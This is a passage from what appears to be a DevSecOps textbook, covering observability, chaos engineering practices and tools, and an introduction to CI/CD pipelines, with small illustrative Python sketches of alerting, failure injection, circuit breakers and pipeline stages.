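The “temporal parameters” idea mentioned above can be sketched as follows: instead of a static threshold that fires immediately, only alert when the metric stays above the threshold for more than a grace window. The sample values and window length are illustrative assumptions.

```python
# Hypothetical sketch: a temporal alert that ignores brief spikes and
# fires only on sustained threshold breaches. Values are illustrative.

def temporal_alert(samples, threshold, grace):
    """Return True only for sustained breaches, ignoring brief spikes."""
    consecutive = 0
    for value in samples:
        if value > threshold:
            consecutive += 1
            if consecutive > grace:
                return True
        else:
            consecutive = 0   # metric recovered; forgo the alert
    return False

# A brief spike that recovers within the grace window is ignored,
# while a sustained breach raises an alert
print(temporal_alert([10, 95, 90, 10], threshold=80, grace=2))
print(temporal_alert([10, 95, 90, 92, 91], threshold=80, grace=2))
```

This kind of damping reduces false positives, which, as noted earlier, are one of the main ways real events get buried and missed.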

Summary

In the world of complex digital systems, a simple “ping” isn’t enough. You need to know how different parts of your ecosystem interact, what’s normal, and what’s not. This chapter took you through this journey, teaching you to embrace the three game-changing pillars: metrics, traces, and logs. You must understand not just the what, but the why and how of system performance and behavior. We need to get the full picture, not just snapshots.

Many believe that observability is just about tools. But this book begs to differ! Get ready to map out a strategy that involves not just collecting data but making meaningful decisions based on it. Your systems generate a goldmine of data; learn how to extract valuable nuggets of insight from the digital noise.


By offering insights into system behavior, spotting abnormalities, and facilitating quick incident response, observability is a potent strategy for improving security. Organizations may fortify their defenses and lessen the impact of security incidents by integrating observability into their security practices. There are some important lessons here: first, observability makes it possible to gain insights into system activity, allowing security concerns to be identified and reacted to quickly. Secondly, incorporating observability tools and methodologies enhances forensic investigations, helping identify and prosecute cybercriminals. The adoption of cutting-edge technology, such as artificial intelligence, machine learning, distributed tracing, and standardized frameworks, is crucial for the future of observability and security. Observability-driven threat hunting and mitigation have the potential to automate incident response and provide a proactive defense.

Overall, organizations may continue to strengthen their security posture, efficiently detect and address threats, and protect their systems and data in a threat environment that is constantly changing by adopting observability and keeping up with developing trends.

This chapter acted as a one-stop guide to help transform you from a systems spectator into a digital detective. You went beyond merely watching dashboards to actively exploring your software, understanding its behaviors and quirks, and, most importantly, what to do when things go haywire. One of this book's golden nuggets is its focus on the human element. Observability isn't a solo expedition; it's a team sport. This is where you will learn how to bridge the communication gap between DevOps, SysAdmins, and other tech teams to create a cohesive, efficient approach to diagnosing and solving problems. Remember, in the sprawling jungle of microservices, APIs, servers, and databases, observability is your superpower.
Don’t just settle for knowing that a system is down; understand why it crashed, how to fix it, and how to prevent it from happening again. You’re not just putting out fires – you’re becoming a fireproof organization. Understanding observability is a mindset. Make the shift and turn the lights on in your darkened digital room. After all, in the world of technology, seeing isn’t just believing; it’s succeeding. In the next chapter, we will understand what chaos engineering is and look at its different techniques and principles.


5
Understanding Chaos Engineering

In the electrifying dance of the digital world, where systems are complex and ever-evolving, there is one partner that often steps on the toes of others: security. Yet, it's this dance partner that ensures the whole performance doesn't descend into a chaotic whirl. In this chapter, we'll explore how chaos engineering twirls with security to create a performance that's as harmonious as it is resilient.

Chaos engineering is a discipline that encourages us to challenge our systems, to stress-test them in unexpected ways, and to learn from these experiences to build stronger, more resilient systems. It's like a vaccine, exposing our systems to small, controlled doses of chaos to build immunity against larger, more damaging disruptions.

So, how does this intersect with security, a field that is all about maintaining integrity, confidentiality, and availability? Can chaos engineering and security dance in sync, each complementing and enhancing the other, to create a more resilient and secure digital ecosystem? In this chapter, we'll explore this question, delving into how chaos engineering can be used to improve the security of our systems. We'll see how injecting controlled security incidents can help us identify weaknesses, improve response mechanisms, and build systems that are not just robust, but truly secure and resilient.

Just as a dancer anticipates their partner's moves, understands their rhythm, and responds in real time to their actions, chaos engineering and security must work together, anticipate potential threats, understand system behaviors, and respond effectively to security incidents. So, grab your dancing shoes as we delve into the intriguing waltz of chaos engineering and security, a dance that is sure to leave our systems stronger, more resilient, and better prepared for the chaotic, unpredictable dance floor of the digital world.
Let’s explore how these two disciplines can become dance partners, rather than adversaries, in our quest for a truly secure and resilient digital infrastructure.


In this chapter, we will cover the following topics:
• Techniques involved in chaos engineering
• Tools involved in performing chaos engineering
• Basic principles of chaos engineering
• How it is different from other testing measures

Introducing chaos engineering

Chaos engineering has its roots in disciplines such as safety engineering in contexts such as aerospace, where structures and components are tested to just before the point of failure. Chaos engineering can be applied to various systems, including IT infrastructure, software systems, and business processes. It is typically performed by injecting simulated failures or "chaos" into the system and observing how it responds. This allows engineers to identify and fix problems before they cause a real-world loss or outage.

Several different techniques can be used to perform chaos engineering, including the following:
• Randomly killing or failing processes or services
• Introducing network delays or packet loss
• Increasing or decreasing the system load
• Removing or adding resources
• Changing system configurations

A team of engineers usually conducts the process of chaos engineering, and it is often automated using specialized tools such as Chaos Monkey that can monitor and control the system during the test. It is important to note that chaos engineering should be performed with caution and control to minimize the risk of unintended consequences.

Let's look at an example. An e-commerce company wants to test the resilience of its distribution system, which handles high levels of traffic during peak hours. The company will conduct a chaos engineering experiment by intentionally introducing network partitions and delays between different parts of the system. The company will then monitor the system to see how it responds to those network partitions and delays.


The results of the experiment may show that the system was able to handle the network partitions and delays without any significant impact on its performance. However, the company may also identify some bottlenecks or areas that need improvement, such as slow response times for certain requests or increased error rates. Based on the results, the company could then take steps to improve the resilience of the system.

This is just an example of a chaos engineering experiment, and the specific results will vary depending on the system being tested and the objectives of the experiment. The experiment should also be done under controlled conditions with a well-defined plan, a clear scope and set of objectives, and with monitoring and safety mechanisms in place.
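The failure-injection loop described above can be sketched in a few lines of Python. This is a toy illustration of the core experiment cycle (establish a steady-state baseline, inject a failure, measure the deviation), not a real chaos tool: `flaky_network_call` and its chaos parameters are hypothetical stand-ins for a service under test.

```python
import random
import time

def flaky_network_call(injected_delay=0.0, failure_rate=0.0):
    """Stand-in for a service call; the chaos parameters inject latency or failure."""
    if random.random() < failure_rate:
        raise ConnectionError("injected failure")
    time.sleep(injected_delay)
    return "ok"

def run_experiment(calls=50, injected_delay=0.0, failure_rate=0.0):
    """Drive the call repeatedly under injected chaos and report the error rate."""
    errors = 0
    for _ in range(calls):
        try:
            flaky_network_call(injected_delay, failure_rate)
        except ConnectionError:
            errors += 1
    return errors / calls

random.seed(7)  # fixed seed so the sketch is repeatable
baseline = run_experiment()                      # steady state: no chaos injected
with_chaos = run_experiment(failure_rate=0.2)    # inject a 20% failure rate
```

Comparing `with_chaos` against the steady-state `baseline` is the whole point: a resilient system (with retries, fallbacks, and so on in front of the flaky call) would keep the observed error rate close to the baseline despite the injected failures.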

Why do we need chaos engineering?

Imagine you're on a ship, sailing across the ocean. It's easy to navigate when the sea is calm and the skies are clear, but what happens when a storm comes? That's when you need to rely on the strength and reliability of your ship, the skills of the crew, and your preparedness for such situations. That's exactly what chaos engineering is for our digital systems. Here are a few reasons why chaos engineering is essential:
• Improving resilience: By intentionally introducing failures, chaos engineering helps identify and enhance a system's resilience. By simulating different types of failures, engineers can design and implement solutions that allow the system to keep running in case of any failure.
• A better understanding of the system: Chaos engineering allows engineers to understand how a system behaves under different conditions. This helps identify potential weaknesses or bottlenecks that may not be apparent during regular operation.
• Improving incident response: By simulating different failures, chaos engineering helps organizations identify and improve their incident response plans.
• Identifying dependencies: By simulating different types of failures, chaos engineering helps engineers understand how various system components depend on each other. This helps identify areas where a failure in one component could have a cascading effect on the entire system.
• Improved user experience: By simulating different types of failures and identifying potential bottlenecks, chaos engineering can help to improve the overall user experience by ensuring that the system remains available and responsive even under heavy load.
• Cost savings: By identifying and mitigating potential issues before they lead to real-world failures, chaos engineering can help to reduce the costs associated with downtime and incident response.
• Compliance and regulatory requirements: By simulating different types of failures and testing incident response plans, chaos engineering can help organizations ensure they are in compliance with various regulatory requirements, including PCI DSS, HIPAA, and GDPR.


Best practices while working with chaos engineering

There are several best practices and methodologies that organizations can follow when working with chaos engineering:
• Define your scope and objectives: Before beginning any chaos engineering experiments, it is important to define the scope of the test and the objectives you hope to achieve. This will help to ensure that the test stays focused and that the results can easily be interpreted.
• Start small: It is best to start with small, controlled experiments before moving on to more complex or wide-scale tests. This will help to minimize the risk of unintended consequences and will also allow you to test and refine your monitoring and safety mechanisms.
• Establish safety mechanisms: Before conducting any chaos engineering experiments, it is important to establish safety mechanisms that can be used to quickly and safely stop the test if it begins to have unintended consequences.
• Monitor the system: It is important to monitor the system during chaos engineering experiments to ensure that the system is behaving as expected and to detect any unintended consequences.
• Communicate with stakeholders: Before conducting any chaos engineering experiments, it is important to communicate with stakeholders so that they are aware of the tests and understand their purpose.
• Plan and execute: Develop a plan for the experiment, execute it, and analyze the results.
• Continuously improve: Continuously improve the system by fixing any issues identified during the experiments and making sure to update incident response plans.

It's important to note that these are just a few best practices and methodologies for working with chaos engineering. The specific approach will depend on the organization and the system being tested. It's also important to note that chaos engineering should only be conducted by experienced engineers who have a good understanding of the system being tested and the risks involved.
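Several of these practices, a defined scope, explicit objectives, and a safety mechanism that stops the test, can be captured in a small experiment plan. The sketch below is illustrative only; the field names and thresholds are made up for this example and are not drawn from any particular chaos framework.

```python
# Hypothetical experiment plan: the scope, objective, and limits are examples only.
experiment = {
    "scope": "checkout-service, staging cluster only",
    "objective": "error rate stays below 1% while one replica is killed",
    "steady_state": lambda m: m["error_rate"] < 0.01,   # hypothesis to verify
    "abort_limit": lambda m: m["error_rate"] > 0.05,    # safety mechanism
}

def run_with_safety(plan, metric_samples):
    """Check each observed metric sample in order; abort the experiment the
    moment the safety limit trips, otherwise report whether the hypothesis held."""
    for sample in metric_samples:
        if plan["abort_limit"](sample):
            return "aborted"              # stop fast, then roll back
        if not plan["steady_state"](sample):
            return "hypothesis-violated"  # a finding to investigate
    return "passed"

result = run_with_safety(experiment, [{"error_rate": 0.002},
                                      {"error_rate": 0.004}])
```

Keeping the abort limit separate from the steady-state hypothesis mirrors the best practice above: a violated hypothesis is a finding worth studying, while a tripped safety limit means the blast radius is growing and the test must stop immediately.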

Techniques involved in chaos engineering

The approach an organization takes to chaos engineering will vary depending on the organization's size, industry, and systems in place. Some organizations may have a dedicated team or department that is responsible for performing chaos engineering experiments, while others may include chaos engineering as a part of their overall security or reliability testing.

Some organizations may have a more formalized process for conducting chaos engineering experiments, including defined scope, objectives, and safety mechanisms. Others may have a more ad hoc approach, conducting experiments on an as-needed basis. Some organizations may also use specialized tools and platforms for performing chaos engineering experiments, while others may rely on manual testing methods.


The organization should also document the results and use that to improve incident response plans, security, and user experience.

Specific systems and services that organizations use for chaos engineering

The specific systems and services that an organization uses chaos engineering on will vary depending on the organization. Some common systems and services that organizations may use chaos engineering on include the following:
• IT infrastructure: Networking, servers, storage, and other IT infrastructure components
• Cloud services: Testing the resiliency and fault tolerance of cloud-based services such as Amazon Web Services, Microsoft Azure, and Google Cloud Platform
• Microservices: Testing the fault tolerance of microservice-based architectures
• Containers: Testing the resiliency of container-based deployments such as Docker and Kubernetes
• Databases: Testing the resiliency of databases such as MySQL, MongoDB, and Cassandra
• Applications: Testing the fault tolerance of web, mobile, and other applications
• Business processes: Testing the resiliency of business processes such as supply chain management, order fulfillment, and customer service

It's important to note that the specific systems and services an organization uses chaos engineering on will depend on their infrastructure, the criticality of the systems, and the organization's risk appetite.

Measuring the effectiveness of performing chaos engineering

Measuring the effectiveness of chaos engineering efforts will differ from organization to organization. Organizations may use the following metrics to evaluate the effectiveness of their chaos engineering efforts:
• Mean Time to Recovery (MTTR): This metric measures the time it takes for the system to recover after a failure. A shorter MTTR indicates a more resilient system.
• Mean Time between Failures (MTBF): This metric measures the time between failures. A longer MTBF indicates a more reliable system.
• Error rate: This metric measures the number of errors that occur during normal operation or after a failure. A lower error rate indicates a more stable system.


• Latency: This metric measures the time it takes for a request to be processed and a response to be returned. Lower latency indicates a more responsive system.
• Availability: This metric measures the percentage of time that the system is available and able to handle requests. Higher availability indicates a more reliable system.
• Impact on users: This metric measures the impact of a failure on users or customers. This can be measured through surveys, user feedback, or analyzing customer service tickets.
• Incidents: This metric measures the number of incidents and their severity.
• Root cause analysis: This analysis identifies the root cause of an incident.

It's important to note that these are just a few examples of metrics that can be used to evaluate the effectiveness of chaos engineering efforts. The specific metrics used will depend on the organization and the systems being tested. Additionally, it's important to have a clear set of objectives and a defined scope for the experiment before starting in order to be able to measure the effectiveness of the chaos engineering effort.
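MTTR and availability can both be derived from a simple incident log of failure and recovery times. The snippet below is a minimal sketch with made-up timestamps; in practice these values would come from your monitoring and incident-management tooling.

```python
from datetime import datetime, timedelta

# Hypothetical incident log: (failure detected, service recovered)
incidents = [
    (datetime(2023, 1, 1, 10, 0), datetime(2023, 1, 1, 10, 30)),
    (datetime(2023, 1, 3, 9, 0), datetime(2023, 1, 3, 9, 10)),
]

def total_downtime(incidents):
    """Sum the outage duration across all incidents."""
    return sum(((up - down) for down, up in incidents), timedelta())

def mttr(incidents):
    """Mean Time to Recovery: average downtime per incident."""
    return total_downtime(incidents) / len(incidents)

def availability(incidents, period):
    """Fraction of the reporting period the system was up."""
    return 1 - total_downtime(incidents) / period

week = timedelta(days=7)
# 40 minutes of downtime over a week: MTTR is 20 minutes,
# availability is 1 - 40/10080, roughly 99.6%.
```

Tracking these numbers before and after each round of chaos experiments is one concrete way to show that the effort is paying off: fixes prompted by experiments should pull MTTR down and push availability up.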

Tools involved in chaos engineering

The following is a list of some popular tools used in chaos engineering practices:
• Chaos Monkey: Originally developed by Netflix, Chaos Monkey randomly terminates virtual machine instances and containers to ensure that engineers implement their services to be resilient to instance failures (https://github.com/Netflix/chaosmonkey).
• Chaos Toolkit: Chaos Toolkit is a simple and extensible toolkit for chaos engineering experiments. It has a clear focus on the user's objectives and provides a way to define, execute, and analyze experiments (https://chaostoolkit.org).
• Gremlin: Gremlin provides a full suite of tools to perform chaos engineering experiments safely and securely across a variety of platforms, including Kubernetes, AWS, GCP, and Azure.
• Litmus: Litmus is a Kubernetes-native chaos engineering tool that helps teams identify weaknesses in their deployments. It offers a variety of chaos experiments for various infrastructure components (https://litmuschaos.io/).
• PowerfulSeal: PowerfulSeal injects failure into your Kubernetes clusters, helping you detect problems as early as possible (https://github.com/bloomberg/powerfulseal).
• Chaos Mesh: Chaos Mesh is a cloud-native chaos engineering platform that orchestrates chaos on Kubernetes environments (https://chaos-mesh.org/).
• Kube-monkey: This is an implementation of Netflix's Chaos Monkey for Kubernetes clusters. It randomly deletes Kubernetes Pods (https://github.com/asobti/kube-monkey).

Basic principles of chaos engineering

Ensuring the safety of systems during chaos engineering experiments is an essential aspect of the process. Here are a few ways that organizations can ensure the safety of their systems during chaos engineering experiments:
• Establishing safety limits: Organizations should set safety limits for the tested systems before conducting any experiments. These limits should take into account the system's expected behavior and should be used to stop an experiment if the system suddenly begins to behave unexpectedly.
• Monitoring the system: Organizations should closely monitor the system during the experiment to detect unintended consequences and ensure that the system behaves as expected.
• Rollback mechanisms: Organizations should have rollback mechanisms in place that can quickly restore the system to its previous state if an experiment begins to have unintended consequences.
• Communication: Organizations should have clear communication channels in place between the teams conducting the experiments and other teams that may be affected by the experiment. This can help to minimize the risk of unintended consequences and allow any issues that may arise to be quickly addressed.
• Testing: Organizations should conduct thorough testing before conducting the experiments in order to minimize the risk of unintended consequences.
• Safety nets: Organizations should have safety nets in place, such as circuit breakers, rate limiters, and other mechanisms that can quickly stop the experiment if something goes wrong.
• Having a plan B: Organizations should have a plan B ready in case of emergency, so that they can act swiftly and minimize the impact of the failure.

It's important to note that these are just a few examples of ways that organizations can ensure the safety of their systems during chaos engineering experiments. The specific approach will depend on the organization and the systems being tested.
Additionally, it’s essential to have a clear set of objectives and a defined scope for the experiment before starting to ensure the safety of the systems.
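The circuit breaker mentioned among the safety nets can be illustrated in a few lines. This is a deliberately minimal sketch of the pattern; production-grade resilience libraries add timeouts and a "half-open" probing state on top of the basic open/closed behavior shown here.

```python
class CircuitBreaker:
    """Minimal circuit-breaker sketch: after max_failures consecutive
    failures, the breaker opens and blocks all further calls."""

    def __init__(self, max_failures=3):
        self.max_failures = max_failures
        self.failures = 0
        self.is_open = False

    def call(self, func, *args):
        if self.is_open:
            raise RuntimeError("circuit open: call blocked")
        try:
            result = func(*args)
        except Exception:
            self.failures += 1
            if self.failures >= self.max_failures:
                self.is_open = True   # stop hammering the failing dependency
            raise
        self.failures = 0             # any success resets the failure count
        return result
```

Routing an experiment's traffic through a breaker like this gives the test a hard stop: if the injected failure cascades further than intended, the open circuit contains the blast radius instead of letting retries amplify it.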

Team communication strategies while performing chaos engineering experiments

Communicating and coordinating with other teams during chaos engineering experiments is an essential aspect of the process. Here are a few ways that organizations can communicate and coordinate with other teams during chaos engineering experiments:
• Clearly define the scope and objectives: Before conducting any experiments, organizations should clearly define the scope and objectives of the experiment and communicate this information to all relevant teams.


• Communicate the schedule: Organizations should communicate the schedule of the experiment to all relevant teams and provide advance notice of when the experiment will be taking place.
• Create a dedicated communication channel: Organizations should create a dedicated communication channel that can be used to communicate information about the experiment in real time.
• Incident response plan: Organizations should have an incident response plan and communicate it to all relevant teams. This plan should outline the steps that should be taken in the event of an unintended consequence.
• Assign a point of contact: Organizations should assign a point of contact that other teams can reach out to with any questions or concerns about the experiment.
• Conduct a post-experiment review: Organizations should conduct a post-experiment review and communicate the results to all relevant teams.
• Continuously improve: Organizations should improve communication and coordination by incorporating feedback from other teams and updating incident response plans.

Developing a robust chaos engineering practice from failures

Incorporating the lessons learned from chaos engineering into an organization's overall security strategy is an important aspect of the process. Here are a few ways that organizations can incorporate the lessons learned from chaos engineering into their overall security strategy:
• Identify and prioritize vulnerabilities: Organizations should identify and prioritize vulnerabilities identified during chaos engineering experiments and develop a plan to address them
• Improve incident response plans: Organizations should incorporate the lessons learned from chaos engineering into their incident response plans to ensure they are better prepared to handle real-world failures
• Continuous improvement: Organizations should continuously improve their systems by incorporating the lessons learned from chaos engineering experiments and by regularly conducting new experiments to identify new vulnerabilities
• Update security policy: Organizations should update their security policies and procedures to reflect the lessons learned from chaos engineering experiments
• Communicate the results: Organizations should communicate the results of chaos engineering experiments to all relevant teams and stakeholders so that they are aware of the vulnerabilities identified and the steps taken to address them
• Integration with other testing methods: Organizations should integrate the results of chaos engineering experiments with other testing methods such as penetration testing, vulnerability scanning, and threat modeling


• Budget allocation: Organizations should allocate the necessary budget and resources to address the vulnerabilities identified during chaos engineering experiments

Challenges around chaos engineering

Chaos engineering, despite its potential benefits, isn't a walk in the park. There are definitely some tricky spots that can make things a bit challenging. Let's discuss a few of them:
• Identifying appropriate and safe failure scenarios to test
• Ensuring that the system is able to recover from failures without causing further issues
• Balancing the need to test the system's resilience with the need to avoid causing harm or disruption to users or customers
• Communicating and coordinating chaos testing with other teams and stakeholders
• Properly monitoring the system during and after chaos tests to identify and analyze any issues that arise
• Lack of specific tools and guidelines for implementing chaos engineering
• Difficulty in establishing a clear scope and defining success criteria
• Difficulty in measuring the improvement after the chaos engineering process is complete

To sum up, chaos engineering helps by intentionally introducing controlled failures or disruptions into a system in order to test its resilience and identify weaknesses. It helps to identify and mitigate potential failures, improving the overall reliability and availability of a system.

How chaos engineering is different from other testing measures

Chaos engineering is like a stunt double for our systems. It takes on the tough, unexpected scenarios to see how our systems would react, so that when the real thing comes along, they're ready to perform. Here's how it's different from other testing measures:
• Real-world conditions: Traditional testing often takes place in controlled, predictable environments. Think of it like practicing a dance routine in a spacious, mirrored dance studio. On the other hand, chaos engineering is like practicing that same routine on a crowded dance floor with spilled drinks and unpredictable dancers. It mimics the unpredictable, chaotic conditions of the real world to see how systems perform under stress.
• Proactive, not reactive: Most testing methods are reactive – they identify bugs or problems after they've occurred, or they validate that a certain feature is working as expected. Chaos engineering is more proactive. It's about poking and prodding our systems on purpose to see whether we can uncover any hidden issues before they become real problems.
• Focus on system resilience: While traditional testing is typically focused on individual features or components, chaos engineering takes a higher-level view. It's more interested in how the system as a whole can handle disruptions and continue to function.
• Running in production: Unlike most traditional testing, which happens in a separate testing or staging environment, chaos engineering often happens in production (i.e., the real world where your users are). This is because production is where true complexity and unpredictability lie.
• Learning from failure: Chaos engineering embraces the idea that failure is not only inevitable but also a valuable source of learning. It helps us to fail better, learn more, and build stronger systems as a result.

Summary We’ve taken a long journey in this chapter, exploring what chaos engineering is all about. Far from being about causing destruction and disorder, chaos engineering is like a stress test for our digital systems, helping us find weaknesses and make them stronger. In a world where our digital systems are as complex as a spider’s web, chaos engineering is like a flashlight helping us see how to improve them. Chaos engineering is a little like being a detective, making educated guesses about where weaknesses might lurk, running experiments, and seeing what we can learn. We found out that chaos engineering is a practical tool that can make our systems better at weathering the inevitable disruptions that come their way. We’ve delved into how we can use different tools and techniques to carry out chaos engineering, and how important it is to have everyone on board – from the tech team right up to the boss. This isn’t something that can be done in a corner, it’s a whole-team effort. Of course, we also had a discussion of some of the challenges with chaos engineering. It’s not a cureall, and it’s got to be done thoughtfully. But the good news is that we’re all learning together, and we can navigate those challenges as a community. As we wrap up, let’s remember one thing: the world of digital systems is always changing and evolving. Chaos engineering is a compass that can guide us through that landscape, helping us understand and prepare for the unpredictable. So, what’s next? Well, the adventure is just starting! This isn’t the end, but the beginning of a journey into building stronger, more resilient systems. Remember to stay curious, keep trying new experiments, and learn as much as you can. Embrace the chaos – it’s how we grow, adapt, and build the best systems we can. So, buckle up and enjoy the ride! In the next chapter, we will cover Continuous Integration and Continuous Deployment (CI/CD) and understand their benefits and importance.

Part 3: Technology

This part introduces you to continuous integration and continuous deployment, as well as aspects of setting up a DevSecOps environment. This part has the following chapters:
• Chapter 6, Continuous Integration and Continuous Deployment
• Chapter 7, Threat Modeling
• Chapter 8, Software Composition Analysis (SCA)
• Chapter 9, Static Application Security Testing (SAST)
• Chapter 10, Infrastructure-as-Code (IaC) Scanning
• Chapter 11, Dynamic Application Security Testing (DAST)

6
Continuous Integration and Continuous Deployment

CI/CD stands for continuous integration/continuous delivery (or deployment). It is a software development practice that involves frequently integrating code changes into a central repository and then automatically building and deploying those changes to a test or production environment. CI is the practice of regularly merging code changes into a shared repository, where automated tests are run to catch any issues that may have been introduced. Continuous delivery ensures changes are production-ready but may require a manual step for deployment, while continuous deployment automatically releases every change that passes all tests to a production environment.

A CI/CD pipeline automates the process of testing, building, and deploying software changes; it helps catch and fix errors early, reduces the risk of introducing bugs, and improves the overall software quality.

We will cover the following topics in this chapter:
• What is CI/CD?
• The benefits of CI/CD
• Automating the CI/CD pipeline
• The importance of the CI/CD pipeline


What is a CI/CD pipeline?

Imagine you're creating a scrapbook. Every time you get new photos, stickers, or materials, you want to add them to your scrapbook and make sure they fit well without spoiling the previous pages. CI/CD is a bit like this process for software development, ensuring every change fits well and gets neatly integrated into the bigger picture.

The CI/CD pipeline is the backbone of modern software practices, ensuring that software is always improving, with changes smoothly integrated and swiftly delivered to users. It's all about making sure your "scrapbook" remains neat, beautiful, and always ready to be shown off!

CI

CI is the process of continuously adding (or integrating) new changes in code to the main project. Every time you get a new photo (code change), you try adding it to your scrapbook (main project) to make sure it fits. Without CI, developers might work separately, and when they try to merge their changes, things can get messy. It's like if multiple people tried to add different items to the same page of a scrapbook without coordinating.

As developers write and commit code, it is continuously integrated into a shared repository. After integration, automated tests ensure that the new code doesn't break anything. In essence, CI is like a safety net that ensures that all parts fit well together.

Example: Imagine you're building a puzzle with a team. Every time a member adds a piece, you check to make sure it fits perfectly and doesn't ruin the image. If it doesn't fit, you correct it immediately. That's similar to how CI works. Developers contribute code (puzzle pieces), and the CI process checks to ensure everything still works together.
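The CI safety net, merging a change only when the automated tests pass against the merged result, can be sketched as follows. The "repository", "change", and test suite here are toy stand-ins for illustration, not a real CI system's API.

```python
def ci_integrate(repo, change, test_suite):
    """Merge a change into a candidate build, run every test against it,
    and land it on main only if the whole suite passes (the CI safety net)."""
    candidate = {**repo, **change}          # merged view of the shared code
    failed = [name for name, test in test_suite.items() if not test(candidate)]
    if failed:
        return repo, failed                 # reject: main stays green
    return candidate, []                    # integrate: main moves forward

main = {"add": lambda a, b: a + b}
change = {"sub": lambda a, b: a - b}
suite = {
    "add_works": lambda c: c["add"](2, 2) == 4,
    "sub_works": lambda c: "sub" in c and c["sub"](5, 3) == 2,
}
main, failures = ci_integrate(main, change, suite)
```

The key design point mirrored from real CI: the tests run against the merged candidate, not the change in isolation, so an incompatibility between a new piece and the existing puzzle is caught before it ever lands on the shared branch.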

CD – continuous delivery and continuous deployment

In terms of continuous delivery, once changes are integrated, they're continuously made ready for release to the public; however, releasing these changes requires manual approval. Continuous deployment goes a step further: every change, once integrated and tested, is automatically released to users without manual intervention.

Let's take a look at these aspects in terms of our scrapbook example:
• Continuous delivery: You've added the photo to the scrapbook, and it's ready to be shown to friends (released), but you'll decide when
• Continuous deployment: When you add a photo or sticker to the scrapbook, you immediately show it off to friends without waiting


Continuous deployment allows faster delivery of features to users and quick feedback. Imagine getting compliments or suggestions on your scrapbook when you add something new!

Just like the process of selecting a photo, gluing it, and adding captions or decorations to a scrapbook page, there are steps to integrate and deliver/deploy software changes. This sequence of automated steps is what we call a pipeline. A CI/CD pipeline is a set of automated processes that allow developers to reliably and efficiently release new changes and features to users. From the moment code is written until it is in the hands of the users, it moves through various stages in this pipeline, including integration, testing, and deployment.

Think of the CI/CD pipeline as an assembly line in a factory. The raw materials (code) enter one end, machines (tools and tests) process the materials at different stages, and the finished product (a working software application) comes out the other end, ready for customers. In the world of software, a CI/CD pipeline can include these steps:
• Committing: A developer writes and commits code to a version control system (such as Git).
• Fetching the latest code: Grabbing the latest "photos" (code changes).
• Building: Turning code into a runnable application. This could involve setting the page layout.
• Testing: Checking if the new changes "fit" well and don't "spoil" anything, as well as making sure that the photo isn't upside down!
• Deployment: Making the new changes live and showing off that scrapbook page.

If the tests pass, the CD process starts. Depending on the setup, the code might either be automatically deployed to a production environment (continuous deployment) or might be moved to a staging environment, where it awaits its final approval (continuous delivery).
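The assembly-line behavior described above can be sketched as an ordered list of stages that fail fast: the moment one stage fails, nothing downstream runs. The stage names and pass/fail checks here are illustrative placeholders.

```python
def run_pipeline(stages):
    """Run pipeline stages in order; stop at the first failure (fail fast)
    and report which stages completed and where the pipeline broke."""
    completed = []
    for name, step in stages:
        if not step():
            return completed, name      # broken stage: deployment never runs
        completed.append(name)
    return completed, None              # all green: the change ships

stages = [
    ("fetch", lambda: True),
    ("build", lambda: True),
    ("test", lambda: False),            # a failing test gates the deploy
    ("deploy", lambda: True),
]
done, broke_at = run_pipeline(stages)
```

With the failing test stage above, `done` contains only the stages before the break and `broke_at` names the culprit, which is exactly the feedback a developer gets from a real pipeline: the deploy step is never reached until the tests go green.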

The benefits of CI/CD

The CI/CD pipeline, a cornerstone of modern software development, offers multiple advantages. By enabling a faster release cycle, it ensures that new features and fixes reach end users swiftly. Through automation, the pipeline makes deliveries consistent and far less error-prone, minimizing manual tasks and the associated risks. This efficiency boosts developer productivity by allowing developers to center their attention on coding rather than administrative chores. An essential aspect of the pipeline is its continuous testing mechanism, which detects issues early on, facilitating a rapid feedback loop. As a cumulative result, not only do developers benefit, but end users also enjoy regular, high-quality updates, enhancing their overall satisfaction. Let’s look at the different benefits:
• Faster release cycle: CI/CD pipelines automate various stages, enabling quicker releases of new features or fixes. It’s like having a fast-food drive-thru instead of a sit-down dinner. Instead of waiting for the whole meal (software release) to be prepared and served, items (code updates) are served quickly, as and when they’re ready.

Continuous Integration and Continuous Deployment

• Consistent and reliable deliveries: Automation reduces the chances of human error. Every code change undergoes the same rigorous set of tests and processes every time. Imagine a cookie-making machine that produces a cookie every time a dough ball is inserted. Each cookie will be of consistent shape and size because the process is automated. This consistency is what CI/CD brings to software releases.
• Early detection of issues: Since code is continuously tested, issues are detected and addressed earlier in the development cycle. Think of a factory assembly line with quality checkpoints. If a toy being assembled has a defect at stage 2, it’s caught right then, rather than after the toy has been fully assembled.
• Reduced manual intervention: Many of the steps are automated, which means fewer manual tasks, reducing the chances of manual errors. Consider modern car washes. Instead of several people manually washing your car, machines handle most of the process. It’s not only faster but also more consistent.
• Enhanced developer productivity: Developers spend less time fixing late-stage bugs or managing releases and more time writing and optimizing code. It’s like a chef using a food processor to chop vegetables. Since the repetitive task of chopping is taken care of quickly, the chef can focus on perfecting the recipe.
• Rapid feedback loop: Developers receive immediate feedback on their changes. This allows for quick adjustments and ensures developers are always working on the highest-priority task. Imagine teaching someone to play a guitar. If you correct their finger placements immediately, they’ll learn faster and more accurately than if feedback were provided days later.
• Improved customer satisfaction: Faster release cycles with fewer bugs mean users get new features quickly and face fewer issues. Think of a favorite app on your phone. If it gets regular updates with cool new features and minimal bugs, you’d likely be a happier user, right?
• Scalable and repeatable process: As the team and project grow, the CI/CD pipeline ensures that the process remains consistent and can handle increased demands. Picture a popular lemonade stand. If they use a tried-and-true recipe and automated juicers, they can easily handle long lines of customers and maybe even open new stands without compromising on quality and taste.

Automating the CI/CD pipeline

Automating the CI/CD pipeline is about ensuring the code’s journey – from writing to production – is smooth and efficient. It’s like setting up a state-of-the-art bakery where cakes (software) are baked, tested, and delivered with minimal human intervention, ensuring consistency, quality, and speed. Let’s break down this automation step by step, keeping the explanations simple and using relatable examples.


Source control

All the code resides in a version-controlled repository; when developers make changes, they “commit” them to the repository. At its core, source control is a system that records changes to files (usually code) over time. This allows multiple people to collaborate on a project without stepping on each other’s toes, and it provides a mechanism to revert to a previous version if needed. Picture a shared digital library. Whenever someone writes a new chapter (code) for a book (software), they add it to the library. Popular tools such as Git, Mercurial, and Subversion have made version control easier and more efficient, allowing teams of any size to collaborate seamlessly on software projects.

The importance of source control
• Collaboration: Multiple developers can work on the same project simultaneously
• History: You can track changes and go back to any previous state of a project
• Accountability: It’s easy to see who made which changes and when
• Backup: In case of issues or errors, there’s always a safe version to revert to

Common terminologies
• Repository (repo): This is where your code lives. It’s a centralized storage space for all code files, revision history, and more. Think of it as a bookshelf dedicated to a specific story. The shelf doesn’t just hold the latest version of the story but all its drafts and changes too.
